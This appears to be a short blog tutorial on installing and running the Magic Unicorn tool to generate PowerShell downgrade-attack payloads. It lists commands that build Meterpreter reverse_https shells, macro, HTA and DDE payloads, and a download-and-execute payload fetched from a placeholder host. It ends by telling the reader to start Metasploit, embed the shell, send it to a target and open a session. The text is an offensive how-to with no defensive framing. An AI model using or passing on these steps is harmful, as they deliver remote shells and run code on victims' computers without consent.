Welcome to Hacking A Rise today we are going to show u the basic tutorial for Magic Unicorn for power shell exploiting
What is Unicorn
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by our own David Kennedy and Josh Kelly at Defcon 18.
Usage is simple. Ensure Metasploit is installed and in the right path. Run Magic Unicorn.
this will generate a powershell command. Simply paste this to a command line window or through a payload delivery system.
How to install unicorn
open terminal type theses commandsgit clone https://github.com/trustedsec/unicorn /unicorncd /unicornls python unicorn.py
How to use unicorn
in terminal type python unicorn.py to get the commands
now to make a shellcode type
Usage: python unicorn.py payload reverse_ipaddr port
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py
Macro Example Shellcode: python unicorn.py
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py
HTA Example Shellcode: python unicorn.py
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py
Custom PS1 Example: python unicorn.py
Cobalt Strike Example: python unicorn.py
Custom Shellcode: python unicorn.py
for this im going to use python unicorn.py windows/meterpreter/reverse_https 192.168.8.101 443 
With till its done
now its going to gave u a code to run type msfconsole -r unicorn.rc two fire up metasploit
just embed the shell and send to ur target and a session will open all u have to do is type sessions 1 then shell
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.